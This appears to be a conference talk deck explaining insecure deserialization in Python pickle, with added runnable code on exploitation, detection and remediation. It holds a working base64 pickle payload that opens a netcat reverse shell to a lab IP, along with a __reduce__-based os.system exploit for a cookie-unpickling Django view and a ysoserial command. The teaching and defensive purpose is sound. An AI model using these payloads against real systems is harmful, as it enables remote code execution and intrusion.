How Eggxactly Insecure Deserialization Exploits work
www.pavanw3b.com
@pavanw3b
The Egg Series
$ whoami
Pavan aka pavanw3b
Iron man fan & Marvel follower
Developer turned Bug Hunter
Manager, Product Security @ ServiceNow
Null Hyderabad core member
www.pavanw3b.com
A Story about Eggs
The Chick has to break out of the shell (video: https://www.youtube.com/watch?v=ozMPRSZ8Ykk)
Why talk about Insecure Deserialization Weakness?
● Many people in Security don’t understand it (observed most candidates fail to explain it clearly in interviews)
● Hard to find for most
● OWASP Top 10 2021 A08: Software and Data Integrity Failures
● It’s fun!
● It’s a Python day, but the same applies in any technology
Everybody knows; nobody understands
What does OWASP say?
The magical code
gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBzaCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu
Base64-decode it: what comes out is a protocol-4 pickle whose opcodes import posix.system and call it with nc -c sh 192.168.17.129 8888, a reverse shell to the attacker's lab host. The rest of this talk explains how a string like this runs a command when it is unpickled.
What’s serialization?
● Wikipedia: Converting an object to a format that can be
stored, transmitted and reconstructed
Bruce to Hulk: Serialization
Break it down:
Object, Stored, Transmitted
and Reconstructed.
Let’s look at Bruce, I mean Object
character = {"first_name": "Bruce", "last_name": "Banner"}
● A dictionary in Python
● character is an Object
● Object (everyday meaning): something that can be seen, touched etc.
● Object in OOP: an instance of a class
● Class: defines the attributes and behaviour of its instances
I thought Python dict is a data type. Are you saying it’s a class?
In Python 3 the distinction between built-in types and classes is gone: dict is a class, and every class is a type.
More details: https://stackoverflow.com/a/35959047
Stored. Why?
● Manage state
● Persist data for processing later
● Recreate objects even after the program has terminated
● Stored on disk, in a database, in a cache, in a message bus, or written to a socket etc.
Transmitted. Why?
● Server to client (end user)
● For consumption by a different technology stack
● Two machines: Machine A wants to send a rich object to Machine B instead of plain data
Reconstructed. Why?
● Server to client (end user): the receiver needs the object back, not bytes
● Another technology needs to process it
● Could be a shared microservice
Why do we serialize?
● An object in one environment can’t be understood by another as-is
● To pass data between layers
○ Client to server
○ File/DB to the business layer etc.
● Microservices
● OOP and MVC encourage seeing everything as an Object or a Model
Example of Serialize & Deserialize
python serialize.py
python deserialize.py
python client-bs.py
python server-bs.py
Base64-encode for better transmission and storage.
Python Pickle
● Python’s default module for serialize/deserialize
● Built in, so usually preferred over a third-party module
● Implements a binary protocol
Pickling = Serializing, Marshalling, Flattening
● Converts objects into a byte stream
● dump() vs dumps(): dump() writes the pickle to a file object, dumps() returns it as a bytes object
Unpickling
● Converts serialized data back into objects: load() reads from a file object, loads() from bytes
Now the problem is
● Not secure: the pickle docs themselves warn that malicious pickle data can execute arbitrary code during unpickling
● Only unpickle data you trust
● Leads to RCE otherwise
Let’s take a deeper look
python serialize-to-file.py
python deserialize-from-file.py
I can control the object. How do I RCE?
● Use the same path as serialization: serialize an RCE payload and hand it to the (insecure) deserialization
● Problem: the payload has to be an object, and a pickle stores data, not code
● Solution: __reduce__()
● __reduce__() is the special method that tells pickle how to rebuild an object it cannot pickle natively
● E.g.: an object holding an open file
Why __reduce__() exists: The Problem
● Some objects cannot be pickled as they are, e.g. one holding an open file handle: pickle.dumps() raises TypeError
Why __reduce__() exists: The Solution
● The class implements __reduce__(), which returns:
● a callable that is invoked when the pickle is expanded (usually the class itself or a factory function)
● a tuple of arguments to pass to that callable
● On unpickling, pickle runs callable(*args) to recreate the object, and nothing restricts which callable is named
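The problem and the solution slides above in working code. This is an added example, not serialize-to-file.py or any other script from the deck: LogReader and RawReader are hypothetical classes that hold an open file handle, and the log file they read is constructed in a temporary location.

```python
import os
import pickle
import tempfile


class RawReader:
    """Hypothetical class holding an open file handle and nothing else.
    Pickle cannot serialize the handle, so pickling this object fails."""

    def __init__(self, path):
        self.path = path
        self.handle = open(path, "r")   # _io.TextIOWrapper: not picklable


class LogReader(RawReader):
    """Same class, now pickle-aware: __reduce__ tells pickle how to rebuild it."""

    def read_all(self):
        self.handle.seek(0)
        return self.handle.read()

    def __reduce__(self):
        # Shape is (callable, args). On unpickling, pickle runs
        # LogReader(self.path), which reopens the file. Nothing in the
        # protocol checks WHICH callable is named here; that is the hook
        # an attack payload abuses.
        return (LogReader, (self.path,))


def pickling_fails(obj):
    """True if pickle refuses the object (the 'problem' slide)."""
    try:
        pickle.dumps(obj)
    except TypeError:   # "cannot pickle '_io.TextIOWrapper' object"
        return True
    return False


def round_trip(obj):
    """dumps() then loads(): what serialize.py / deserialize.py do, in memory."""
    return pickle.loads(pickle.dumps(obj))


def demo():
    """Returns (raw_fails, rebuilt_content, rebuilt_is_same_object)."""
    # Constructed sample input: a small log file in a temp location.
    fd, path = tempfile.mkstemp(suffix=".log")
    with os.fdopen(fd, "w") as f:
        f.write("user=bruce action=login\n")

    raw = RawReader(path)
    reader = LogReader(path)
    rebuilt = None
    try:
        raw_fails = pickling_fails(raw)      # True: no __reduce__, handle cannot be pickled
        rebuilt = round_trip(reader)         # works: __reduce__ reopens the file
        return raw_fails, rebuilt.read_all(), rebuilt is reader
    finally:
        for r in (raw, reader, rebuilt):
            if r is not None:
                r.handle.close()
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```

The rebuilt object is a fresh LogReader with its own handle, not the original; all pickle stored was the name of a callable and its arguments.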
Creating Payload
● Create the payload: a class whose __reduce__() returns (os.system, ("<command>",))
● Dump it into a pickle file
● Deserialize it insecurely
python attack.py
python deserialize-from-file.py
Target: Django Application
● User form data is pickled and set in a cookie
● The cookie value is unpickled on the next request
● Expects a base64-encoded “user” cookie
● Design: get the User object from the client side
● #MVC
Getting a Reverse Shell from the Target
● Use __reduce__ and return os.system with your RCE payload (have the listener waiting before the cookie is sent)
● Serialize it, base64-encode it and print it
● Edit the user cookie and reload
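The payload, the cookie and the vulnerable view in one runnable file, covering both the "Creating Payload" steps and the Django cookie attack. This is an added example, not attack.py or the insecure-django code: load_user_cookie stands in for the Django view that unpickles the user cookie, the user dict is constructed, and the command is a harmless echo rather than the deck's netcat reverse shell.

```python
import base64
import io
import os
import pickle
import pickletools


class Exploit:
    """Attacker-side object. Pickling it stores no Exploit at all: __reduce__
    makes the stream say 'import os.system and call it with cmd'."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def make_user_cookie(user):
    """What the app does on form submit: pickle the user dict, base64 it."""
    return base64.b64encode(pickle.dumps(user)).decode()


def make_attack_cookie(cmd):
    """What attack.py does: same encoding, but the object is the payload."""
    return base64.b64encode(pickle.dumps(Exploit(cmd))).decode()


def load_user_cookie(cookie):
    """The vulnerable view: trusts whatever the client sends back.
    With the attack cookie, os.system(cmd) runs inside pickle.loads()
    and the view receives os.system's return value instead of a user dict."""
    return pickle.loads(base64.b64decode(cookie))


def opcodes(cookie):
    """Opcode names in the stream, to see that it is a program, not data."""
    return [op.name for op, _arg, _pos in pickletools.genops(base64.b64decode(cookie))]


def disassemble(cookie):
    """Human-readable listing, as pickletools.dis prints it."""
    out = io.StringIO()
    pickletools.dis(base64.b64decode(cookie), out=out)
    return out.getvalue()


if __name__ == "__main__":
    good = make_user_cookie({"first_name": "Bruce", "last_name": "Banner"})
    bad = make_attack_cookie("echo pwned")      # a reverse shell command would go here
    print(load_user_cookie(good))               # the dict comes back
    print(disassemble(bad))                     # GLOBAL/STACK_GLOBAL ... REDUCE ... STOP
    print(load_user_cookie(bad))                # prints "pwned", returns 0
```

Note what the view gets back from the attack cookie: not an Exploit instance but the integer os.system returned. The application code never saw the object; the unpickler had already executed the call.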
Why is Pickle exploitable this way?
● Not because pickles contain code
● Because unpickling creates objects by calling constructors (any importable callable) named in the pickle
● Pickle Virtual Machine (PVM)
● The serialized stream is actually a list of instructions: GLOBAL / STACK_GLOBAL imports a callable by module and name, REDUCE calls it with the arguments on the stack
● The unpickler executes the opcodes directly, so the attacker chooses both the callable and its arguments
Common places to check for insecure deserialization
● Cookie values
● Files: user-supplied uploads, log files, pandas DataFrames saved with to_pickle() and read back with read_pickle()
● Social media feeds / tweets
● Anywhere user-controlled data gets converted into objects
Watch out for in White box Code Reviews
● Python: pickle.loads(), pickle.load(), yaml.load() without Loader=SafeLoader
● PHP: unserialize()
● Java: XMLDecoder, XStream.fromXML(), ObjectInputStream.readObject(), and classes that implement Serializable or define readObject, readObjectNoData, readResolve, readExternal, readUnshared etc.
Watch out for in Black box dynamic testing
● Python: protocol 2+ pickles start with byte 0x80 (base64 beginning gA, gASV for the protocol-4 payload above) and end with a dot (.), the STOP opcode
● Java: AC ED 00 05 in hex, rO0AB in base64, Content-Type: application/x-java-serialized-object
● .NET (BinaryFormatter): 00 01 00 00 00 FF FF FF FF in hex, AAEAAAD///// in base64
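A small classifier for the indicators above, as an added example rather than a tool from the deck: it checks raw bytes and base64 text for the Java, .NET and pickle signatures and for the Java content type. The HTTP fields are constructed; the cookie value is the deck's own slide-9 payload string, which is only inspected here, never unpickled.

```python
import base64
import binascii
import re

# Signatures from the slide, as bytes at the start of the raw stream.
JAVA_MAGIC = b"\xac\xed\x00\x05"                          # STREAM_MAGIC + STREAM_VERSION, "rO0AB" in base64
DOTNET_MAGIC = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"    # BinaryFormatter header, "AAEAAAD/////" in base64
PICKLE_PROTO = b"\x80"                                    # PROTO opcode, pickle protocol 2 and later
PICKLE_STOP = b"."                                        # STOP opcode, always last
JAVA_CONTENT_TYPE = "application/x-java-serialized-object"

_B64_RE = re.compile(rb"[A-Za-z0-9+/_-]+={0,2}")


def decode_if_base64(value):
    """Return the decoded bytes if value is base64 text, else the raw bytes."""
    data = value.encode() if isinstance(value, str) else value
    if _B64_RE.fullmatch(data) and len(data) % 4 == 0:
        try:
            std = data.replace(b"-", b"+").replace(b"_", b"/")   # accept urlsafe too
            return base64.b64decode(std, validate=True)
        except binascii.Error:
            pass
    return data


def classify(value):
    """Name the serialization format a value looks like, or None."""
    raw = decode_if_base64(value)
    if raw.startswith(JAVA_MAGIC):
        return "java"
    if raw.startswith(DOTNET_MAGIC):
        return "dotnet"
    if raw.startswith(PICKLE_PROTO) and raw.endswith(PICKLE_STOP):
        return "python-pickle"   # protocol 0/1 text pickles are not caught here
    return None


def scan_request(headers, cookies, params):
    """Flag request fields that carry serialized objects. Returns {location: format}."""
    findings = {}
    if JAVA_CONTENT_TYPE in headers.get("Content-Type", "").lower():
        findings["header:Content-Type"] = "java"
    for name, value in cookies.items():
        fmt = classify(value)
        if fmt:
            findings[f"cookie:{name}"] = fmt
    for name, value in params.items():
        fmt = classify(value)
        if fmt:
            findings[f"param:{name}"] = fmt
    return findings


# The slide-9 payload, inspected only (never passed to pickle.loads).
SLIDE_PAYLOAD = ("gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBz"
                 "aCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu")

# Constructed request: one pickled cookie, one Java and one .NET parameter,
# plus ordinary values that must not be flagged.
SAMPLE_REQUEST = dict(
    headers={"Content-Type": "application/x-www-form-urlencoded"},
    cookies={"user": SLIDE_PAYLOAD, "theme": "dark", "session": "abcd1234"},
    params={
        "state": base64.b64encode(JAVA_MAGIC + b"sr\x00\x11java.util.HashMap").decode(),
        "vs": base64.b64encode(DOTNET_MAGIC + b"\x01\x00\x00\x00").decode(),
        "q": "bruce banner",
    },
)

if __name__ == "__main__":
    for where, fmt in scan_request(**SAMPLE_REQUEST).items():
        print(f"{where}: looks like {fmt}")
```

The base64 check is deliberately strict (alphabet, length, padding) so that ordinary cookie values such as session IDs are not decoded into garbage and then mis-classified.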
Utilities for detection and exploitation
● frohoff/ysoserial: Java
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping domain.com' > payload
● pwntester/ysoserial.net: .NET
● Burp Extension: Java Deserialization Scanner by federicodotta
Remediate
● Don’t spoil your Pickle: don’t unpickle untrusted data. Pickle has no validation step; if you cannot avoid it, restrict find_class as the pickle docs show under Restricting Globals
● Other languages: use look-ahead deserialization, i.e. check the class name before instantiating it, together with an allowlist of classes
● Be careful with the allowlist: even harmless classes such as hash sets and arrays can be nested to cause DoS, in the spirit of the XML billion laughs attack
● Fix: Java 9 serial filters (JEP 290, ObjectInputFilter) can reject classes and also cap depth and array size
Design & Configuration Recommendations
● Prefer language-agnostic data formats (JSON, or YAML loaded with a safe loader) over native binary serialization
● Sign serialized data with an HMAC and verify it before deserializing, so tampered data is rejected before it reaches the deserializer
● Don’t rely on WAFs alone: they have no visibility into internal traffic such as message buses and service-to-service calls
● Avoid generic serialization; serialize each class explicitly into plain fields
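The two recommendations a Python app would actually ship, as an added example (not code from the deck or the insecure-django repo): an HMAC-signed JSON cookie in place of the pickled one, and, for the case where pickle cannot be dropped yet, the restricted Unpickler pattern from the pickle docs' Restricting Globals section with an allowlist and a size cap. SECRET is a placeholder for a key loaded from settings, and the malicious protocol-0 pickle is written by hand for the demonstration.

```python
import base64
import hashlib
import hmac
import io
import json
import pickle

SECRET = b"replace-with-a-key-from-settings"   # assumption: comes from config, never hard-coded
MAX_PICKLE_BYTES = 64 * 1024                    # crude cap against resource-exhaustion pickles


# --- Option 1: drop pickle; ship JSON with an HMAC so tampering is detected ---

def sign_user_cookie(user):
    """JSON -> urlsafe base64 -> append hex HMAC-SHA256 over the encoded body."""
    body = base64.urlsafe_b64encode(
        json.dumps(user, sort_keys=True, separators=(",", ":")).encode()
    ).decode()
    tag = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_user_cookie(cookie):
    """Constant-time check of the tag BEFORE anything is parsed."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        raise ValueError("malformed cookie")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("cookie signature mismatch")
    return json.loads(base64.urlsafe_b64decode(body))


def verify_or_none(cookie):
    """Convenience wrapper: the user dict, or None if the cookie is rejected."""
    try:
        return verify_user_cookie(cookie)
    except ValueError:
        return None


# --- Option 2: pickle must stay; refuse every global outside an allowlist ---

ALLOWED_GLOBALS = {
    # Plain dict/list/str/int/bytes are built from opcodes and need no global
    # at all; sets do under protocols below 4, so they are listed explicitly.
    "builtins": {"set", "frozenset"},
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL opcode; os.system never gets past here.
        if name in ALLOWED_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    if len(data) > MAX_PICKLE_BYTES:
        raise pickle.UnpicklingError("pickle too large")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_restricted(data):
    """('ok', obj) or ('rejected', reason), to show both outcomes."""
    try:
        return "ok", restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


def benign_pickle():
    """Constructed sample: what the app itself would have pickled."""
    return pickle.dumps({"first_name": "Bruce", "last_name": "Banner"})


# Constructed malicious pickle, protocol 0 written by hand:
# GLOBAL os.system, MARK, STRING, TUPLE, REDUCE, STOP.
EVIL_PICKLE = b"cos\nsystem\n(S'echo should-not-run'\ntR."

if __name__ == "__main__":
    cookie = sign_user_cookie({"first_name": "Bruce", "last_name": "Banner"})
    print(cookie, verify_or_none(cookie))
    print(try_restricted(benign_pickle()))
    print(try_restricted(EVIL_PICKLE))      # ('rejected', "global 'os.system' is forbidden")
```

The signature is checked before the body is even base64-decoded, so a modified cookie never reaches a parser. The allowlist handles the class-name problem; the size cap is the cheap answer to the nested-collection DoS caveat above, since an allowlist alone does nothing about a pickle that is structurally hostile rather than calling a forbidden global.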
References:
● pickle — Python object serialization — Python 3.10.5 documentation
● Pickling Objects in Python
● BlackHat 2011 - Sour Pickles, A serialised exploitation guide in one part
● Class vs. Type in Python - Stack Overflow
● Deserialization - OWASP Cheat Sheet Series
Takeaways
Code: https://github.com/pavanw3b/insecure-django
Slides: https://tinyurl.com/nullhyd-pavanw3b-mar-23
Blog: https://darkw3b.com/insecure-deserialization-pythoin-pickle-django/
